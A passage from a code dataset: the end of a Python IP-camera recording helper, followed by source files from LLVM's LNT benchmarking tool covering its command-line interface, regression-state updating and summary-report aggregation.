:param file_name: file_name of output file (with file extension)
:return: Tuple[success: bool, message: str]
"""
# Get webaccess to camera
access = self.__client.get_webaccess_connection(self.__config['camera'])
# Record using ffmpeg
cmd = get_ffmpeg_command(file_name, self.__config['video'])
return run_ffmpeg_and_record(cmd, self.__config['video'].get('duration'), access)
def do_test_run(self) -> bool:
"""
Records from IP camera without being triggered by a webhook
Ensures there is a subfolder Video's
Removes the previous test file if it is still there
Usefull to test if you configured the recording properly
:return: success: bool
"""
# Make folder if it isn't there yet
folder = os.path.join(os.getcwd(), 'videos')
os.makedirs(folder, exist_ok=True)
# Remove previous test video file
video_file = os.path.join(folder, test_filename)
if os.path.isfile(video_file):
os.unlink(video_file)
# Test recording
logging.info('Testing recording')
result = self.record(test_filename)
if result[0]:
logging.info('recording was successful, saved file in folder '
'%s, with name %s', video_folder, test_filename)
return True
logging.info('recording failed with message: %s', result[1])
return False
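# --- Added usage sketch (assumption: not part of the original module) ---
# Prints the ffmpeg command line that get_ffmpeg_command() builds for a typical
# 'video' section of the config, which is handy when tuning recording settings.
if __name__ == "__main__":
    example_video_config = {'framerate': 30, 'duration': 10,
                            'debug_info': False, 'recode': True}
    print(' '.join(get_ffmpeg_command('example.mp4', example_video_config)))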
``` |
{
"source": "jobvdl1997/llvm-lnt",
"score": 2
} |
#### File: lnt/lnttool/main.py
```python
from __future__ import print_function
from .common import init_logger
from .common import submit_options
from .convert import action_convert
from .create import action_create
from .import_data import action_import
from .import_report import action_importreport
from .updatedb import action_updatedb
from .viewcomparison import action_view_comparison
from .admin import group_admin
from lnt.util import logger
import click
import logging
import sys
@click.command("runserver", short_help="start a new development server")
@click.argument("instance_path", type=click.UNPROCESSED)
@click.option("--hostname", default="localhost", show_default=True,
help="host interface to use")
@click.option("--port", default=8000, show_default=True,
help="local port to use")
@click.option("--reloader", is_flag=True, help="use WSGI reload monitor")
@click.option("--debugger", is_flag=True, help="use WSGI debugger")
@click.option("--profiler", is_flag=True, help="use WSGI profiler")
@click.option("--profiler-file", help="file to dump profile info to")
@click.option("--profiler-dir",
help="pstat.Stats files are saved to this directory ")
@click.option("--shell", is_flag=True, help="load in shell")
@click.option("--show-sql", is_flag=True, help="show all SQL queries")
@click.option("--threaded", is_flag=True, help="use a threaded server")
@click.option("--processes", default=1, show_default=True,
help="number of processes to use")
def action_runserver(instance_path, hostname, port, reloader, debugger,
profiler, profiler_file, profiler_dir, shell, show_sql,
threaded, processes):
"""start a new development server
\b
Start the LNT server using a development WSGI server. Additional options can be
used to control the server host and port, as well as useful development
features such as automatic reloading.
The command has built-in support for running the server on an instance which
has been packed into a (compressed) tarball. The tarball will be automatically
unpacked into a temporary directory and removed on exit. This is useful for
passing database instances back and forth, when others only need to be able to
view the results.
"""
import lnt.server.ui.app
import os
init_logger(logging.INFO, show_sql=show_sql)
app = lnt.server.ui.app.App.create_standalone(instance_path,)
if debugger:
app.debug = True
if profiler:
import werkzeug.contrib.profiler
if profiler_dir:
if not os.path.isdir(profiler_dir):
os.mkdir(profiler_dir)
app.wsgi_app = werkzeug.contrib.profiler.ProfilerMiddleware(
app.wsgi_app, stream=open(profiler_file, 'w'),
profile_dir=profiler_dir)
if shell:
from flask import current_app
from flask import g
import code
ctx = app.test_request_context()
ctx.push()
vars = globals().copy()
vars.update(locals())
shell = code.InteractiveConsole(vars)
shell.interact()
else:
app.run(hostname, port,
use_reloader=reloader,
use_debugger=debugger,
threaded=threaded,
processes=processes)
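# --- Added usage note (a sketch derived from the click options above, not from
# separate documentation): a typical development invocation would be, e.g.
#   lnt runserver /path/to/instance --hostname 0.0.0.0 --port 8000 --reloader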
@click.command("checkformat")
@click.argument("files", nargs=-1, type=click.Path(exists=True))
@click.option("--testsuite", "-s", default='nts')
def action_checkformat(files, testsuite):
"""check the format of LNT test report files"""
import lnt.server.config
import lnt.server.db.v4db
import lnt.util.ImportData
db = lnt.server.db.v4db.V4DB('sqlite:///:memory:',
lnt.server.config.Config.dummy_instance())
session = db.make_session()
for file in files:
result = lnt.util.ImportData.import_and_report(
None, None, db, session, file, '<auto>', testsuite)
lnt.util.ImportData.print_report_result(result, sys.stdout,
sys.stderr, verbose=True)
@click.command("check-no-errors")
@click.argument("files", nargs=-1, type=click.Path(exists=True))
def action_check_no_errors(files):
'''Check that report contains "no_error": true.'''
import json
error_msg = None
for file in files:
try:
data = json.load(open(file))
except Exception as e:
error_msg = 'Could not read report: %s' % e
break
# Get 'run' or 'Run' { 'Info' } section (old/new format)
run_info = data.get('run', None)
if run_info is None:
run_info = data.get('Run', None)
if run_info is not None:
run_info = run_info.get('Info', None)
if run_info is None:
error_msg = 'Could not find run section'
break
no_errors = run_info.get('no_errors', False)
if no_errors is not True and no_errors != "True":
error_msg = 'run section does not specify "no_errors": true'
break
if error_msg is not None:
sys.stderr.write("%s: %s\n" % (file, error_msg))
sys.exit(1)
def _print_result_url(results, verbose):
result_url = results.get('result_url')
if result_url is not None:
if verbose:
print("Results available at:", result_url)
else:
print(result_url)
elif verbose:
print("Results available at: no URL available")
class RunTestCLI(click.MultiCommand):
def list_commands(self, ctx):
import lnt.tests
return lnt.tests.get_names()
def get_command(self, ctx, name):
import lnt.tests
try:
return lnt.tests.get_module(name).cli_action
except KeyError:
return None
@click.group("runtest", cls=RunTestCLI, context_settings=dict(
ignore_unknown_options=True, allow_extra_args=True,))
def group_runtest():
"""run a builtin test application"""
init_logger(logging.INFO)
@click.command("showtests")
def action_showtests():
"""show the available built-in tests"""
import lnt.tests
import inspect
print('Available tests:')
test_names = lnt.tests.get_names()
max_name = max(map(len, test_names))
for name in test_names:
test_module = lnt.tests.get_module(name)
description = inspect.cleandoc(test_module.__doc__)
print(' %-*s - %s' % (max_name, name, description))
@click.command("submit")
@click.argument("url")
@click.argument("files", nargs=-1, type=click.Path(exists=True), required=True)
@submit_options
@click.option("--verbose", "-v", is_flag=True,
help="show verbose test results")
def action_submit(url, files, select_machine, merge, verbose):
"""submit a test report to the server"""
from lnt.util import ServerUtil
import lnt.util.ImportData
results = ServerUtil.submitFiles(url, files, verbose,
select_machine=select_machine,
merge_run=merge)
for submitted_file in results:
if verbose:
lnt.util.ImportData.print_report_result(
submitted_file, sys.stdout, sys.stderr, True)
_print_result_url(submitted_file, verbose)
if len(files) != len(results):
sys.exit(1)
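# A usage sketch; the server URL and file name are hypothetical and depend on
# how the target instance is deployed:
#
#   lnt submit http://localhost:8000/submitRun report.json -v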
@click.command("send-daily-report")
@click.argument("instance_path", type=click.UNPROCESSED)
@click.argument("address")
@click.option("--database", default="default", show_default=True,
help="database to use")
@click.option("--testsuite", default="nts", show_default=True,
help="testsuite to use")
@click.option("--host", default="localhost", show_default=True,
help="email relay host to use")
@click.option("--from", "from_address", default=None, required=True,
help="from email address")
@click.option("--today", is_flag=True,
help="send the report for today (instead of most recent)")
@click.option("--subject-prefix", help="add a subject prefix")
@click.option("--dry-run", is_flag=True, help="don't actually send email")
@click.option("--days", default=3, show_default=True,
help="number of days to show in report")
@click.option("--filter-machine-regex",
help="only show machines that contain the regex")
def action_send_daily_report(instance_path, address, database, testsuite, host,
from_address, today, subject_prefix, dry_run,
days, filter_machine_regex):
"""send a daily report email"""
import contextlib
import datetime
import email.mime.multipart
import email.mime.text
import lnt.server.reporting.dailyreport
import smtplib
# Load the LNT instance.
instance = lnt.server.instance.Instance.frompath(instance_path)
config = instance.config
# Get the database.
with contextlib.closing(config.get_database(database)) as db:
session = db.make_session()
# Get the testsuite.
ts = db.testsuite[testsuite]
if today:
date = datetime.datetime.utcnow()
else:
# Get a timestamp to use to derive the daily report to generate.
latest = session.query(ts.Run).\
order_by(ts.Run.start_time.desc()).limit(1).first()
# If we found a run, use its start time (rounded up to the next
# hour, so we make sure it gets included).
if latest:
date = latest.start_time + datetime.timedelta(hours=1)
else:
# Otherwise, just use now.
date = datetime.datetime.utcnow()
# Generate the daily report.
logger.info("building report data...")
report = lnt.server.reporting.dailyreport.DailyReport(
ts, year=date.year, month=date.month, day=date.day,
day_start_offset_hours=date.hour, for_mail=True,
num_prior_days_to_include=days,
filter_machine_regex=filter_machine_regex)
report.build(session)
logger.info("generating HTML report...")
ts_url = "%s/db_%s/v4/%s" \
% (config.zorgURL, database, testsuite)
subject = "Daily Report: %04d-%02d-%02d" % (
report.year, report.month, report.day)
html_report = report.render(ts_url, only_html_body=False)
utf8_html_report = html_report.encode('utf-8')
if subject_prefix is not None:
subject = "%s %s" % (subject_prefix, subject)
# Form the multipart email message.
msg = email.mime.multipart.MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = from_address
msg['To'] = address
msg.attach(email.mime.text.MIMEText(utf8_html_report, 'html', 'utf-8'))
# Send the report.
if not dry_run:
s = smtplib.SMTP(host)
s.sendmail(from_address, [address],
msg.as_string())
s.quit()
else:
out = sys.stdout
out.write("From: %s\n" % msg['From'])
out.write("To: %s\n" % msg['To'])
out.write("Subject: %s\n" % msg['Subject'])
out.write("=== html report\n")
out.write(html_report + "\n")
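# A usage sketch (paths and addresses are hypothetical); --dry-run prints the
# generated report to stdout instead of mailing it:
#
#   lnt send-daily-report /path/to/instance qa-list@example.com \
#       --from lnt@example.com --testsuite nts --days 3 --dry-run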
@click.command("send-run-comparison")
@click.argument("instance_path", type=click.UNPROCESSED)
@click.argument("run_a_id")
@click.argument("run_b_id")
@click.option("--database", default="default", show_default=True,
help="database to use")
@click.option("--testsuite", default="nts", show_default=True,
help="testsuite to use")
@click.option("--host", default="localhost", show_default=True,
help="email relay host to use")
@click.option("--from", "from_address", default=None, required=True,
help="from email address")
@click.option("--to", "to_address", default=None, required=True,
help="to email address")
@click.option("--subject-prefix", help="add a subject prefix")
@click.option("--dry-run", is_flag=True, help="don't actually send email")
def action_send_run_comparison(instance_path, run_a_id, run_b_id, database,
testsuite, host, from_address, to_address,
subject_prefix, dry_run):
"""send a run-vs-run comparison email"""
    import contextlib
    import email.mime.multipart
    import email.mime.text
    import lnt.server.reporting.dailyreport
    import lnt.server.reporting.runs
    import lnt.server.ui.app
    import smtplib
init_logger(logging.ERROR)
# Load the LNT instance.
instance = lnt.server.instance.Instance.frompath(instance_path)
config = instance.config
# Get the database.
with contextlib.closing(config.get_database(database)) as db:
session = db.make_session()
# Get the testsuite.
ts = db.testsuite[testsuite]
# Lookup the two runs.
run_a_id = int(run_a_id)
run_b_id = int(run_b_id)
run_a = session.query(ts.Run).\
filter_by(id=run_a_id).first()
run_b = session.query(ts.Run).\
filter_by(id=run_b_id).first()
if run_a is None:
logger.error("invalid run ID %r (not in database)" % (run_a_id,))
if run_b is None:
logger.error("invalid run ID %r (not in database)" % (run_b_id,))
# Generate the report.
data = lnt.server.reporting.runs.generate_run_data(
session, run_b, baseurl=config.zorgURL, result=None,
compare_to=run_a, baseline=None, aggregation_fn=min)
env = lnt.server.ui.app.create_jinja_environment()
text_template = env.get_template('reporting/run_report.txt')
text_report = text_template.render(data)
utf8_text_report = text_report.encode('utf-8')
html_template = env.get_template('reporting/run_report.html')
html_report = html_template.render(data)
utf8_html_report = html_report.encode('utf-8')
subject = data['subject']
if subject_prefix is not None:
subject = "%s %s" % (subject_prefix, subject)
# Form the multipart email message.
msg = email.mime.multipart.MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = from_address
msg['To'] = to_address
msg.attach(email.mime.text.MIMEText(utf8_text_report, 'plain', 'utf-8'))
msg.attach(email.mime.text.MIMEText(utf8_html_report, 'html', 'utf-8'))
# Send the report.
if not dry_run:
mail_client = smtplib.SMTP(host)
mail_client.sendmail(
from_address,
[to_address],
msg.as_string())
mail_client.quit()
else:
out = sys.stdout
out.write("From: %s\n" % from_address)
out.write("To: %s\n" % to_address)
out.write("Subject: %s\n" % subject)
out.write("=== text/plain report\n")
out.write(text_report + "\n")
out.write("=== html report\n")
out.write(html_report + "\n")
@click.group("profile")
def action_profile():
"""tools to extract information from profiles"""
return
@action_profile.command("upgrade")
@click.argument("input", type=click.Path(exists=True))
@click.argument("output", type=click.Path())
def command_update(input, output):
"""upgrade a profile to the latest version"""
import lnt.testing.profile.profile as profile
profile.Profile.fromFile(input).upgrade().save(filename=output)
@action_profile.command("getVersion")
@click.argument("input", type=click.Path(exists=True))
def command_get_version(input):
"""print the version of a profile"""
import lnt.testing.profile.profile as profile
print(profile.Profile.fromFile(input).getVersion())
@action_profile.command("getTopLevelCounters")
@click.argument("input", type=click.Path(exists=True))
def command_top_level_counters(input):
"""print the whole-profile counter values"""
import json
import lnt.testing.profile.profile as profile
print(json.dumps(profile.Profile.fromFile(input).getTopLevelCounters()))
@action_profile.command("getFunctions")
@click.argument("input", type=click.Path(exists=True))
@click.option("--sortkeys", is_flag=True)
def command_get_functions(input, sortkeys):
"""print the functions in a profile"""
import json
import lnt.testing.profile.profile as profile
print(json.dumps(profile.Profile.fromFile(input).getFunctions(),
sort_keys=sortkeys))
@action_profile.command("getCodeForFunction")
@click.argument("input", type=click.Path(exists=True))
@click.argument('fn')
def command_code_for_function(input, fn):
"""print the code/instruction for a function"""
import json
import lnt.testing.profile.profile as profile
print(json.dumps(
list(profile.Profile.fromFile(input).getCodeForFunction(fn))))
def _version_check():
"""
    Check that the installed version of LNT is up-to-date with the running
package.
This check is used to force users of distribute's develop mode to reinstall
when the version number changes (which may involve changing package
requirements).
"""
import pkg_resources
import lnt
# Get the current distribution.
installed_dist = pkg_resources.get_distribution("LNT")
installed_dist_name = "%s %s" % (installed_dist.project_name,
installed_dist.version)
current_dist_name = "LNT %s" % (lnt.__version__,)
if pkg_resources.parse_version(installed_dist_name) != \
pkg_resources.parse_version(current_dist_name):
raise SystemExit("""\
error: installed distribution %s is not current (%s), you may need to reinstall
LNT or rerun 'setup.py develop' if using development mode.""" % (
installed_dist_name, current_dist_name))
def show_version(ctx, param, value):
"""print LNT version"""
import lnt
if not value or ctx.resilient_parsing:
return
if lnt.__version__:
print("LNT %s" % (lnt.__version__, ))
ctx.exit()
@click.group(invoke_without_command=True, no_args_is_help=True)
@click.option('--version', is_flag=True, callback=show_version,
expose_value=False, is_eager=True, help=show_version.__doc__)
def main():
"""LNT command line tool
\b
Use ``lnt <command> --help`` for more information on a specific command.
"""
_version_check()
main.add_command(action_check_no_errors)
main.add_command(action_checkformat)
main.add_command(action_convert)
main.add_command(action_create)
main.add_command(action_import)
main.add_command(action_importreport)
main.add_command(action_profile)
main.add_command(action_runserver)
main.add_command(action_send_daily_report)
main.add_command(action_send_run_comparison)
main.add_command(action_showtests)
main.add_command(action_submit)
main.add_command(action_updatedb)
main.add_command(action_view_comparison)
main.add_command(group_admin)
main.add_command(group_runtest)
if __name__ == '__main__':
main()
```
#### File: db/rules/rule_update_fixed_regressions.py
```python
from sqlalchemy.orm.session import Session
from typing import Dict # noqa: flake8 does not detect use in comments
from lnt.server.db.regression import RegressionState
from lnt.server.db.regression import get_cr_for_field_change, get_ris
from lnt.server.db.testsuitedb import TestSuiteDB
from lnt.testing.util.commands import timed
from lnt.util import logger
from lnt.server.reporting.analysis import MIN_PERCENTAGE_CHANGE
def _fixed_rind(session, ts, rind):
"""Is this regression indicator fixed?"""
fc = rind.field_change
if fc is None:
return False
current_cr, _, _ = get_cr_for_field_change(session, ts, fc, current=True)
if current_cr.pct_delta < MIN_PERCENTAGE_CHANGE:
return True
else:
return False
def is_fixed(session, ts, regression):
"""Comparing the current value to the regression, is this regression now
fixed?
"""
r_inds = get_ris(session, ts, regression.id)
fixes = (_fixed_rind(session, ts, x) for x in r_inds)
return all(fixes)
def impacts(session, ts, run_id, regression):
# type: (Session, TestSuiteDB, int, TestSuiteDB.Regression) -> bool
"""Does this run have a chance of impacting this regression?
This is just to prevent doing a full comparison, so we don't have
    to be totally accurate. For now, compare machines."""
machine_id = session.query(ts.Run.machine_id).filter(ts.Run.id == run_id).scalar()
regression_machines = [x[0] for x in session.query(ts.FieldChange.machine_id)
.join(ts.RegressionIndicator)
.filter(ts.RegressionIndicator.regression_id == regression.id)
.all()]
regression_machines_set = set(regression_machines)
return machine_id in regression_machines_set
def age_out_oldest_regressions(session, ts, num_to_keep=50):
# type: (Session, TestSuiteDB, int) -> int
"""Find the oldest regressions that are still in the detected state,
    and age them out. This is needed because, when regressions are not manually
    acknowledged, the set of detected regressions can grow unbounded.
:param session: db session
:param ts: testsuite
:param num_to_keep: the number of newest regressions to keep in the detected state.
:returns: the number of regressions changed.
"""
regression_orders = session.query(ts.Regression.id, ts.FieldChange.end_order_id) \
.filter(ts.Regression.state == RegressionState.DETECTED) \
.join(ts.RegressionIndicator, ts.Regression.id == ts.RegressionIndicator.regression_id) \
.join(ts.FieldChange) \
.all()
regression_newest_change = {} # type: Dict[int, int]
for regression_id, order_id in regression_orders:
current = regression_newest_change.get(regression_id)
if current is None or current < order_id:
regression_newest_change[regression_id] = order_id
# Order regressions by FC end order.
ordered = sorted(regression_newest_change.items(), key=lambda x: x[1])
to_move = ordered[0:(-1 * num_to_keep)]
for r, _ in to_move:
regress = session.query(ts.Regression).filter_by(id=r).one()
logger.info("Ageing out regression {} to keep regression count under {}."
.format(regress, num_to_keep))
regress.state = RegressionState.IGNORED
return len(to_move)
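# Worked example (hypothetical IDs): with num_to_keep=2 and newest-change
# orders {10: 5, 11: 9, 12: 7}, `ordered` becomes [(10, 5), (12, 7), (11, 9)],
# so to_move is [(10, 5)] and only regression 10 is aged out to IGNORED; the
# two regressions with the newest field changes stay in DETECTED.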
@timed
def regression_evolution(session, ts, run_id):
"""Analyse regressions. If they have changes, process them.
Look at each regression in state detect. Move to ignore if it is fixed.
Look at each regression in state stage. Move to verify if fixed.
Look at regressions in detect, do they match our policy? If no, move to
NTBF.
"""
logger.info("Running regression evolution")
# Clear the cache before we start.
ts.machine_to_latest_order_cache = {}
changed = 0
evolve_states = [RegressionState.DETECTED, RegressionState.STAGED,
RegressionState.ACTIVE]
regressions = session.query(ts.Regression) \
.filter(ts.Regression.state.in_(evolve_states)) \
.all()
detects = [r for r in regressions if r.state == RegressionState.DETECTED]
staged = [r for r in regressions if r.state == RegressionState.STAGED]
active = [r for r in regressions if r.state == RegressionState.ACTIVE]
# Remove the oldest detected regressions if needed.
num_regression_to_keep = 50
if len(detects) > num_regression_to_keep:
changed += age_out_oldest_regressions(session, ts, num_regression_to_keep)
for regression in detects:
if impacts(session, ts, run_id, regression) and is_fixed(session, ts, regression):
logger.info("Detected fixed regression" + str(regression))
regression.state = RegressionState.IGNORED
regression.title = regression.title + " [Detected Fixed]"
changed += 1
for regression in staged:
if impacts(session, ts, run_id, regression) and is_fixed(session, ts, regression):
logger.info("Staged fixed regression" + str(regression))
regression.state = RegressionState.DETECTED_FIXED
regression.title = regression.title + " [Detected Fixed]"
changed += 1
for regression in active:
if impacts(session, ts, run_id, regression) and is_fixed(session, ts, regression):
logger.info("Active fixed regression" + str(regression))
regression.state = RegressionState.DETECTED_FIXED
regression.title = regression.title + " [Detected Fixed]"
changed += 1
session.commit()
logger.info("Changed the state of {} regressions".format(changed))
post_submission_hook = regression_evolution
```
#### File: server/reporting/summaryreport.py
```python
import re
import lnt.testing
import lnt.util.stats
###
# Aggregation Function
class Aggregation(object):
def __init__(self):
self.is_initialized = False
def __repr__(self):
return repr(self.getvalue())
def getvalue(self):
        raise NotImplementedError("getvalue() must be implemented by subclasses")
def append(self, values):
if not self.is_initialized:
self.is_initialized = True
self._initialize(values)
self._append(values)
class Sum(Aggregation):
def __init__(self):
Aggregation.__init__(self)
self.sum = None
def getvalue(self):
return self.sum
def _initialize(self, values):
self.sum = [0.] * len(values)
def _append(self, values):
for i, value in enumerate(values):
self.sum[i] += value
class Mean(Aggregation):
def __init__(self):
Aggregation.__init__(self)
self.count = 0
self.sum = None
def getvalue(self):
return [value/self.count for value in self.sum]
def _initialize(self, values):
self.sum = [0.] * len(values)
def _append(self, values):
for i, value in enumerate(values):
self.sum[i] += value
self.count += 1
class GeometricMean(Aggregation):
def __init__(self):
Aggregation.__init__(self)
self.count = 0
self.product = None
def getvalue(self):
        return [value ** (1.0 / self.count) for value in self.product]
    def __repr__(self):
        return repr(self.getvalue())
def _initialize(self, values):
self.product = [1.] * len(values)
def _append(self, values):
for i, value in enumerate(values):
self.product[i] *= value
self.count += 1
class NormalizedMean(Mean):
def _append(self, values):
baseline = values[0]
Mean._append(self, [v/baseline
for v in values])
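# Behaviour sketch for the aggregations above (values are illustrative). Each
# append() call passes one value per report order; getvalue() reduces across
# the appended rows:
#
#   s = Sum();            s.append([1.0, 2.0]); s.append([3.0, 4.0])
#   s.getvalue()          # -> [4.0, 6.0]
#   g = GeometricMean();  g.append([2.0, 2.0]); g.append([8.0, 8.0])
#   g.getvalue()          # -> [4.0, 4.0]
#   n = NormalizedMean(); n.append([2.0, 4.0])
#   n.getvalue()          # -> [1.0, 2.0]  (each row is normalized to its first entry)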
###
class SummaryReport(object):
def __init__(self, db, report_orders, report_machine_names,
report_machine_patterns):
self.db = db
self.testsuites = list(db.testsuite.values())
self.report_orders = list((name, orders)
for name, orders in report_orders)
self.report_machine_names = set(report_machine_names)
self.report_machine_patterns = list(report_machine_patterns)
self.report_machine_rexes = [
re.compile(pattern)
for pattern in self.report_machine_patterns
]
self.data_table = None
self.requested_machine_ids = None
self.requested_machines = None
self.runs_at_index = None
self.warnings = []
def build(self, session):
# Build a per-testsuite list of the machines that match the specified
# patterns.
def should_be_in_report(machine):
if machine.name in self.report_machine_names:
return True
for rex in self.report_machine_rexes:
if rex.match(machine.name):
return True
self.requested_machines = dict(
(ts, list(filter(should_be_in_report, session.query(ts.Machine).all())))
for ts in self.testsuites)
self.requested_machine_ids = dict(
(ts, [m.id for m in machines])
for ts, machines in self.requested_machines.items()
)
# First, collect all the runs to summarize on, for each index in the
# report orders.
self.runs_at_index = []
for _, orders in self.report_orders:
# For each test suite...
runs = []
for ts in self.testsuites:
# Find all the orders that match.
result = session.query(ts.Order.id).\
filter(ts.Order.llvm_project_revision.in_(
orders)).all()
ts_order_ids = [id for id, in result]
# Find all the runs that matchs those orders.
if not ts_order_ids:
ts_runs = []
else:
ts_runs = session.query(ts.Run).\
filter(ts.Run.order_id.in_(ts_order_ids)).\
filter(ts.Run.machine_id.in_(
self.requested_machine_ids[ts])).all()
if not ts_runs:
self.warnings.append(
'no runs for test suite %r in orders %r' % (
ts.name, orders))
runs.append((ts_runs, ts_order_ids))
self.runs_at_index.append(runs)
# Load the tests for each testsuite.
self.tests = dict((ts, dict((test.id, test)
for test in session.query(ts.Test)))
for ts in self.testsuites)
# Compute the base table for aggregation.
#
# The table is indexed by a test name and test features, which are
# either extracted from the test name or from the test run (depending
# on the suite).
#
# Each value in the table contains a array with one item for each
# report_order entry, which contains all of the samples for that
# entry..
#
# The table keys are tuples of:
# (<test name>,
# <metric>, # Value is either 'Compile Time' or 'Execution Time'.
# <arch>,
# <build mode>, # Value is either 'Debug' or 'Release'.
# <machine id>)
self.data_table = {}
        self._build_data_table(session)
# Compute indexed data table by applying the indexing functions.
self._build_indexed_data_table()
# Normalize across all machines.
self._build_normalized_data_table()
# Build final organized data tables.
self._build_final_data_tables()
    def _build_data_table(self, session):
def get_nts_datapoints_for_sample(ts, sample):
# Get the basic sample info.
run_id = sample[0]
machine_id = run_machine_id_map[run_id]
run_parameters = run_parameters_map[run_id]
# Get the test.
test = ts_tests[sample[1]]
# The test name for a sample in the NTS suite is just the name of
# the sample test.
test_name = test.name
# The arch and build mode are derived from the run flags.
arch = run_parameters['cc_target'].split('-')[0]
if '86' in arch:
arch = 'x86'
if run_parameters['OPTFLAGS'] == '-O0':
build_mode = 'Debug'
else:
build_mode = 'Release'
# Return a datapoint for each passing field.
for field_name, field, status_field in ts_sample_metric_fields:
# Ignore failing samples.
if status_field:
status_field_index = ts.get_field_index(status_field)
if sample[2 + status_field_index] == lnt.testing.FAIL:
continue
# Ignore missing samples.
field_index = ts.get_field_index(field)
value = sample[2 + field_index]
if value is None:
continue
# Otherwise, return a datapoint.
if field_name == 'compile_time':
metric = 'Compile Time'
else:
assert field_name == 'execution_time'
metric = 'Execution Time'
yield ((test_name, metric, arch, build_mode, machine_id),
value)
def get_compile_datapoints_for_sample(ts, sample):
# Get the basic sample info.
run_id = sample[0]
machine_id = run_machine_id_map[run_id]
run_parameters = run_parameters_map[run_id]
# Get the test.
test = ts_tests[sample[1]]
# Extract the compile flags from the test name.
base_name, flags = test.name.split('(')
assert flags[-1] == ')'
other_flags = []
build_mode = None
for flag in flags[:-1].split(','):
# If this is an optimization flag, derive the build mode from
# it.
if flag.startswith('-O'):
if '-O0' in flag:
build_mode = 'Debug'
else:
build_mode = 'Release'
continue
# If this is a 'config' flag, derive the build mode from it.
if flag.startswith('config='):
if flag == "config='Debug'":
build_mode = 'Debug'
else:
assert flag == "config='Release'"
build_mode = 'Release'
continue
# Otherwise, treat the flag as part of the test name.
other_flags.append(flag)
# Form the test name prefix from the remaining flags.
test_name_prefix = '%s(%s)' % (base_name, ','.join(other_flags))
# Extract the arch from the run info (and normalize).
arch = run_parameters['cc_target'].split('-')[0]
if arch.startswith('arm'):
arch = 'ARM'
elif '86' in arch:
arch = 'x86'
# The metric is fixed.
metric = 'Compile Time'
# Report the user and wall time.
for field_name, field, status_field in ts_sample_metric_fields:
if field_name not in ('user_time', 'wall_time'):
continue
# Ignore failing samples.
if status_field:
status_field_index = ts.get_field_index(status_field)
if sample[2 + status_field_index] == lnt.testing.FAIL:
continue
# Ignore missing samples.
field_index = ts.get_field_index(field)
value = sample[2 + field_index]
if value is None:
continue
# Otherwise, return a datapoint.
yield (('%s.%s' % (test_name_prefix, field_name), metric, arch,
build_mode, machine_id), value)
def get_datapoints_for_sample(ts, sample):
# The exact datapoints in each sample depend on the testsuite
if ts.name == 'nts':
return get_nts_datapoints_for_sample(ts, sample)
else:
assert ts.name == 'compile'
return get_compile_datapoints_for_sample(ts, sample)
# For each column...
for index, runs in enumerate(self.runs_at_index):
# For each test suite and run list...
for ts, (ts_runs, _) in zip(self.testsuites, runs):
ts_tests = self.tests[ts]
# Compute the metric fields.
ts_sample_metric_fields = [
(f.name, f, f.status_field)
for f in ts.Sample.get_metric_fields()]
# Compute a mapping from run id to run.
run_id_map = dict((r.id, r)
for r in ts_runs)
# Compute a mapping from run id to machine id.
run_machine_id_map = dict((r.id, r.machine.name)
for r in ts_runs)
# Preload the run parameters.
run_parameters_map = dict((r.id, r.parameters)
for r in ts_runs)
# Load all the samples for all runs we are interested in.
columns = [ts.Sample.run_id, ts.Sample.test_id]
columns.extend(f.column for f in ts.sample_fields)
samples = session.query(*columns).filter(
ts.Sample.run_id.in_(list(run_id_map.keys())))
for sample in samples:
run = run_id_map[sample[0]]
datapoints = list()
for key, value in get_datapoints_for_sample(ts, sample):
items = self.data_table.get(key)
if items is None:
items = [[]
for _ in self.report_orders]
self.data_table[key] = items
items[index].append(value)
def _build_indexed_data_table(self):
def is_in_execution_time_filter(name):
for key in ("SPEC", "ClamAV", "lencod", "minisat", "SIBSim4",
"SPASS", "sqlite3", "viterbi", "Bullet"):
if key in name:
return True
def compute_index_name(key):
test_name, metric, arch, build_mode, machine_id = key
# If this is a nightly test..
if test_name.startswith('SingleSource/') or \
test_name.startswith('MultiSource/') or \
test_name.startswith('External/'):
# If this is a compile time test, aggregate all values into a
# cumulative compile time.
if metric == 'Compile Time':
return ('Lmark', metric, build_mode, arch, machine_id), Sum
# Otherwise, this is an execution time. Index the cumulative
# result of a limited set of benchmarks.
assert metric == 'Execution Time'
if is_in_execution_time_filter(test_name):
return ('Lmark', metric, build_mode, arch, machine_id), Sum
# Otherwise, ignore the test.
return
# Otherwise, we have a compile time suite test.
# Ignore user time results for now.
if not test_name.endswith('.wall_time'):
return
# Index full builds across all job sizes.
if test_name.startswith('build/'):
project_name, subtest_name = re.match(
r'build/(.*)\(j=[0-9]+\)\.(.*)', str(test_name)).groups()
return (('Full Build (%s)' % (project_name,),
metric, build_mode, arch, machine_id),
NormalizedMean)
# Index single file tests across all inputs.
if test_name.startswith('compile/'):
file_name, stage_name, subtest_name = re.match(
r'compile/(.*)/(.*)/\(\)\.(.*)', str(test_name)).groups()
return (('Single File (%s)' % (stage_name,),
metric, build_mode, arch, machine_id),
Mean)
# Index PCH generation tests by input.
if test_name.startswith('pch-gen/'):
file_name, subtest_name = re.match(
r'pch-gen/(.*)/\(\)\.(.*)', str(test_name)).groups()
return (('PCH Generation (%s)' % (file_name,),
metric, build_mode, arch, machine_id),
Mean)
# Otherwise, ignore the test.
return
def is_missing_samples(values):
for samples in values:
if not samples:
return True
self.indexed_data_table = {}
for key, values in self.data_table.items():
# Ignore any test which is missing some data.
if is_missing_samples(values):
self.warnings.append("missing values for %r" % (key,))
continue
# Select the median values.
medians = [lnt.util.stats.median(samples)
for samples in values]
# Compute the index name, and ignore unused tests.
result = compute_index_name(key)
if result is None:
continue
index_name, index_class = result
item = self.indexed_data_table.get(index_name)
if item is None:
self.indexed_data_table[index_name] = item = index_class()
item.append(medians)
def _build_normalized_data_table(self):
self.normalized_data_table = {}
for key, indexed_value in self.indexed_data_table.items():
test_name, metric, build_mode, arch, machine_id = key
if test_name.startswith('Single File'):
aggr = Mean
else:
aggr = NormalizedMean
normalized_key = (test_name, metric, build_mode, arch)
item = self.normalized_data_table.get(normalized_key)
if item is None:
self.normalized_data_table[normalized_key] = \
item = aggr()
item.append(indexed_value.getvalue())
single_file_stage_order = [
'init', 'driver', 'syntax', 'irgen_only', 'codegen', 'assembly']
def _build_final_data_tables(self):
self.grouped_table = {}
self.single_file_table = {}
for key, normalized_value in self.normalized_data_table.items():
test_name, metric, build_mode, arch = key
# If this isn't a single file test, add a plot for it grouped by
# metric and build mode.
group_key = (metric, build_mode)
if not test_name.startswith('Single File'):
items = self.grouped_table[group_key] = self.grouped_table.get(
group_key, [])
